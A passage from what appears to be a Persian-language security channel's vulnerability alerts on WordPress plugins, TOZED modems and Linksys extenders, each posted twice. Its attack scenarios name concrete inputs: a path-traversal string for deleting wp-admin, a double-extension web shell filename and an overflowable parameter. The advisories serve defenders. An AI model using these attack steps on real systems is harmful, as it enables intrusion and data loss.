update_qr_code()، فایل وبشل خود را بدون نیاز به هیچگونه نام کاربری یا رمز عبور، بر روی سرور آپلود میکند.۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز میکند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا میکند و کنترل کامل آن را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13377
🔴 Risk Level: CRITICAL (Score: 9.6)
تحلیل آسیبپذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه:
📄 توضیحات آسیبپذیری:
آسیبپذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.
این ضعف امنیتی در تمام نسخههای
این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه میدهد تا پوشههای دلخواه را روی سرور حذف کنند.
💥 تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی برای وبسایت شود، از جمله:
🔻 از دست رفتن دادهها (Data Loss): مهاجم میتواند پوشههای حیاتی مانند
🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشههای اصلی وردپرس مانند
🔻 آسیب به یکپارچگی سایت: حذف پوشههای مربوط به قالبها (themes) یا سایر افزونهها (plugins) میتواند ساختار و عملکرد سایت را مختل کند.
🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وبسایت هدف میشود. سپس با ارسال یک درخواست دستکاریشده به سرور که تابع آسیبپذیر را فراخوانی میکند، از تکنیک پیمایش مسیر (Path Traversal) مانند
برای مثال، مهاجم میتواند درخواستی ارسال کند که باعث شود سرور مسیر
به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی
---
✅ توصیههای امنیتی:
🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده بهروزرسانی کنید.
🔸 در صورتی که بهروزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.
🔸 همواره از فایلها و پایگاه داده وبسایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.6)
تحلیل آسیبپذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه:
CVE-2025-13377📄 توضیحات آسیبپذیری:
آسیبپذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.
این ضعف امنیتی در تمام نسخههای
2.32.7 و پایینتر وجود دارد. مشکل اصلی از تابع get_cache_dir_for_page_from_url() نشأت میگیرد که در آن، اعتبارسنجی مسیر فایل به درستی انجام نمیشود.این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه میدهد تا پوشههای دلخواه را روی سرور حذف کنند.
💥 تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی برای وبسایت شود، از جمله:
🔻 از دست رفتن دادهها (Data Loss): مهاجم میتواند پوشههای حیاتی مانند
wp-content/uploads که حاوی فایلهای رسانهای کاربران است را حذف کند.🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشههای اصلی وردپرس مانند
wp-admin یا wp-includes، وبسایت به طور کامل از دسترس خارج شده و دچار اختلال در سرویسدهی میشود.🔻 آسیب به یکپارچگی سایت: حذف پوشههای مربوط به قالبها (themes) یا سایر افزونهها (plugins) میتواند ساختار و عملکرد سایت را مختل کند.
🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وبسایت هدف میشود. سپس با ارسال یک درخواست دستکاریشده به سرور که تابع آسیبپذیر را فراخوانی میکند، از تکنیک پیمایش مسیر (Path Traversal) مانند
../ استفاده میکند تا مسیر یک پوشه حیاتی را هدف قرار دهد.برای مثال، مهاجم میتواند درخواستی ارسال کند که باعث شود سرور مسیر
/wp-content/plugins/10web-booster/cache/../../../../wp-admin/ را به عنوان مسیر حذف کش در نظر بگیرد.به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی
wp-admin را به طور کامل حذف میکند. در نتیجه، پنل مدیریت وردپرس از دسترس خارج شده و سایت با اختلال جدی مواجه میشود.---
✅ توصیههای امنیتی:
🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده بهروزرسانی کنید.
🔸 در صورتی که بهروزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.
🔸 همواره از فایلها و پایگاه داده وبسایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12966
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس
📌 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع
💥 تأثیر:
تأثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وبشل - Web Shell) میتواند کنترل کامل سرور میزبان وبسایت را در دست بگیرد.
پیامدهای این حمله میتواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)
🕵️♂️ سناریوی حمله:
۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست میآورد. (این کار میتواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).
۲. سپس، یک فایل مخرب مانند یک وبشل با پسوند
۳. مهاجم با استفاده از قابلیت آسیبپذیر در افزونه، فایل
۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز میکند.
۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا میکند و میتواند هر دستوری را اجرا نماید.
---
💡 توصیههای امنیتی:
- بهروزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.
- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسیهای غیرضروری به کاربران نامعتبر خودداری کنید.
- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) میتواند به شناسایی و مسدودسازی تلاشها برای آپلود فایلهای مخرب کمک کند.
- بررسی فایلها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، بهویژه در پوشههای آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس
📌 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
All-in-One Video Gallery برای وردپرس شناسایی شده است. این نقص امنیتی نسخههای 4.5.4 تا 4.5.7 این افزونه را تحت تأثیر قرار میدهد.نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع
resolve_import_directory() است. این حفره به مهاجمان احرازهویتشده با سطح دسترسی "نویسنده" (Author) و بالاتر اجازه میدهد تا فایلهای دلخواه خود، از جمله فایلهای اجرایی مخرب، را بر روی سرور سایت آسیبپذیر آپلود کنند.💥 تأثیر:
تأثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وبشل - Web Shell) میتواند کنترل کامل سرور میزبان وبسایت را در دست بگیرد.
پیامدهای این حمله میتواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)
🕵️♂️ سناریوی حمله:
۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست میآورد. (این کار میتواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).
۲. سپس، یک فایل مخرب مانند یک وبشل با پسوند
.php آماده میکند. این فایل حاوی کدهایی برای اجرای دستورات روی سرور است.۳. مهاجم با استفاده از قابلیت آسیبپذیر در افزونه، فایل
shell.php خود را آپلود میکند. به دلیل نبود اعتبارسنجی، سیستم فایل مخرب را میپذیرد.۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز میکند.
۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا میکند و میتواند هر دستوری را اجرا نماید.
---
💡 توصیههای امنیتی:
- بهروزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.
- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسیهای غیرضروری به کاربران نامعتبر خودداری کنید.
- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) میتواند به شناسایی و مسدودسازی تلاشها برای آپلود فایلهای مخرب کمک کند.
- بررسی فایلها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، بهویژه در پوشههای آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13065
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-13065
📝 توضیح آسیبپذیری:
افزونه
💥 تأثیرات و پیامدها:
مهمترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم میتواند کنترل کامل وبسایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و دربهای پشتی (Backdoors) برای دسترسیهای آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.
👨💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل
مهاجم یک فایل مخرب (مانند یک وبشل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره میکند؛ برای مثال:
سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی میکند.
به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل
در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وبسایت و سرور تسلط کامل پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-13065
📝 توضیح آسیبپذیری:
افزونه
Starter Templates برای وردپرس در تمامی نسخهها تا نسخه 4.4.41 (شامل این نسخه) دارای آسیبپذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) است. علت اصلی این مشکل، اعتبارسنجی ناکافی نوع فایلهای WXR است. این نقص به مهاجم اجازه میدهد تا با استفاده از فایلهایی با پسوند دوگانه (مانند file.php.xml)، مکانیزمهای امنیتی را دور زده و فایل مخرب خود را به عنوان یک فایل WXR معتبر آپلود کند. این آسیبپذیری به مهاجمان احرازهویتشده با سطح دسترسی نویسنده (author) و بالاتر، امکان آپلود فایلهای دلخواه روی سرور سایت را میدهد که میتواند منجر به اجرای کد از راه دور (Remote Code Execution) شود.💥 تأثیرات و پیامدها:
مهمترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم میتواند کنترل کامل وبسایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و دربهای پشتی (Backdoors) برای دسترسیهای آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.
👨💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل
author وارد پیشخوان وردپرس میشود.مهاجم یک فایل مخرب (مانند یک وبشل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره میکند؛ برای مثال:
shell.php.xml.سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی میکند.
به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل
.xml معتبر شناسایی و روی سرور آپلود میکند.در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وبسایت و سرور تسلط کامل پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14126
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری:
🔎 شرح آسیبپذیری:
یک آسیبپذیری با شناسه
⚠️ تأثیر و پیامدها:
مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، میتواند با استفاده از این اعتبارنامههای افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه میدهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وبسایتهای جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطهای برای اجرای حملات بیشتر علیه سایر دستگاههای موجود در شبکه.
🎯 سناریوی حمله:
۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل میشود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً
۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد میشود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و میتواند به راحتی اهداف مخرب خود را پیادهسازی کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری:
CVE-2025-14126🔎 شرح آسیبپذیری:
یک آسیبپذیری با شناسه
CVE-2025-14126 در مودمهای TOZED مدلهای ZLT M30S و ZLT M30S PRO با نسخههای فریمور 1.47 و 3.09.06 شناسایی شده است. این ضعف امنیتی به دلیل وجود اعتبارنامههای از پیشتعیینشده (Hard-coded Credentials) در یکی از توابع بخش رابط وب (Web Interface) دستگاه رخ میدهد. این بدان معناست که یک نام کاربری و رمز عبور ثابت و غیرقابل تغییر در نرمافزار مودم کدنویسی شده است. حمله برای بهرهبرداری از این آسیبپذیری باید از داخل شبکه محلی (LAN) انجام شود. اکسپلویت مربوط به این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده به هشدارهای امنیتی پاسخی نداده است.⚠️ تأثیر و پیامدها:
مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، میتواند با استفاده از این اعتبارنامههای افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه میدهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وبسایتهای جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطهای برای اجرای حملات بیشتر علیه سایر دستگاههای موجود در شبکه.
🎯 سناریوی حمله:
۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل میشود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً
192.168.1.1) را در مرورگر خود باز میکند.۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد میشود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و میتواند به راحتی اهداف مخرب خود را پیادهسازی کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14133
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعهدهندههای شبکه Linksys
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدلهای توسعهدهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع
مهاجم میتواند با ارسال یک مقدار دستکاریشده در پارامتر
دستگاههای تحت تاثیر:
(در نسخههای فریمور مشخص شده در جزئیات CVE)
تاثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به دو نتیجه خطرناک شود:
۱. اجرای کد از راه دور (RCE): مهاجم میتواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطهای برای حمله به سایر سیستمهای درون شبکه استفاده نماید.
۲. ممانعت از سرویس (DoS): مهاجم میتواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.
با توجه به اینکه کد بهرهبرداری (Exploit) این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهرهبرداری از آن بسیار بالا ارزیابی میشود.
سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعهدهندههای Linksys آسیبپذیر اسکن میکند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاریشده به پنل وب دستگاه ارسال میکند.
این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر
در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش میکند. این فرآیند به مهاجم اجازه میدهد تا با سطح دسترسی سیستمعامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعهدهندههای شبکه Linksys
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدلهای توسعهدهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع
AP_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد.مهاجم میتواند با ارسال یک مقدار دستکاریشده در پارامتر
clientsname_0، این آسیبپذیری را از راه دور و بدون نیاز به احرازهویت فعال کند.دستگاههای تحت تاثیر:
Linksys RE6500Linksys RE6250Linksys RE6300Linksys RE6350Linksys RE7000Linksys RE9000(در نسخههای فریمور مشخص شده در جزئیات CVE)
تاثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به دو نتیجه خطرناک شود:
۱. اجرای کد از راه دور (RCE): مهاجم میتواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطهای برای حمله به سایر سیستمهای درون شبکه استفاده نماید.
۲. ممانعت از سرویس (DoS): مهاجم میتواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.
با توجه به اینکه کد بهرهبرداری (Exploit) این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهرهبرداری از آن بسیار بالا ارزیابی میشود.
سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعهدهندههای Linksys آسیبپذیر اسکن میکند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاریشده به پنل وب دستگاه ارسال میکند.
این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر
clientsname_0 است که به تابع آسیبپذیر ارسال میشود. این داده ورودی، از فضای اختصاصدادهشده در پشته فراتر رفته و آدرس بازگشت تابع را بازنویسی میکند.در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش میکند. این فرآیند به مهاجم اجازه میدهد تا با سطح دسترسی سیستمعامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14134
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14134
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
این ضعف امنیتی در تابع
این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیبپذیری هیچ پاسخی نداده است.
دستگاههای تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای آسیبپذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001
💥 تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.
این به معنای آن است که مهاجم میتواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریتی دستگاه، پارامتر
این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه میدهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریقشده توسط خود منتقل کند. در نتیجه، مهاجم میتواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیبپذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14134
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
CVE-2025-14134 در برخی از توسعهدهندههای شبکه (Range Extender) شرکت Linksys شناسایی شده است.این ضعف امنیتی در تابع
RE2000v2Repeater_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد. مهاجم میتواند با دستکاری و ارسال مقادیر مخرب به آرگومان clientsname_0، این آسیبپذیری را فعالسازی کند.این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیبپذیری هیچ پاسخی نداده است.
دستگاههای تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای آسیبپذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001
💥 تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.
این به معنای آن است که مهاجم میتواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریتی دستگاه، پارامتر
clientsname_0 را با دادهای بسیار طولانیتر از ظرفیت بافر مربوطه مقداردهی میکند.این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه میدهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریقشده توسط خود منتقل کند. در نتیجه، مهاجم میتواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیبپذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal